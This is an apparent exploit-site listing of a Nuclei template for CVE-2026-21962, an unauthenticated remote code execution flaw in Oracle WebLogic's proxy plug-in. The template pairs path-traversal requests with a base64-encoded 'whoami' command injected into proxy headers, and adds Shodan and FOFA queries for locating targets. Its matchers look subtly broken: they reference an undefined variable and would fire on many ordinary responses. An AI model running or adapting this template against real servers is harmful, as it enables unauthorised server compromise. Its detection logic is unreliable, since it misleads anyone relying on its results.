4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-21962.yaml YAML
id: CVE-2026-21962

info:
  name: Oracle WebLogic Server Proxy Plug-In - Unauthenticated Remote Code Execution
  author: Ashwesker
  severity: critical
  description: |
    Oracle WebLogic Server Proxy Plug-In is vulnerable to unauthenticated remote code execution via specially crafted HTTP requests.
    Allows full server compromise without authentication.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-21962
    - https://www.oracle.com/security-alerts/cpujan2026.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2026-21962
    cwe-id: CWE-20
    epss-score: 0.98
  metadata:
    verified: true
    shodan-query: http.title:"Oracle HTTP Server" || http.component:"weblogic"
    fofa-query: title="Oracle HTTP Server" || server="Oracle-HTTP-Server"
  tags: cve,cve2026,oracle,weblogic,rce,unauth,proxy,nuclei

http:
  - method: GET
    path:
      - "{{BaseURL}}/weblogic/..;/bea_wls_internal/ProxyServlet"
      - "{{BaseURL}}/wl_proxy/..;/bea_wls_internal/ProxyServlet"
      - "{{BaseURL}}/_proxy/..;/bea_wls_internal/ProxyServlet"

    headers:
      WL-Proxy-Client-IP: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}"
      Proxy-Client-IP: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}"
      X-Forwarded-For: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 302
          - 500

      - type: word
        part: body
        words:
          - "{{whoami}}"
          - "oracle"
          - "weblogic"
          - "root"
          - "nobody"
        condition: or

      - type: dsl
        dsl:
          - "len(body) > 0"

    extractors:
      - type: regex
        name: username
        part: body
        regex:
          - '([a-zA-Z0-9_-]+)\s*\(whoami output\)'
        group: 1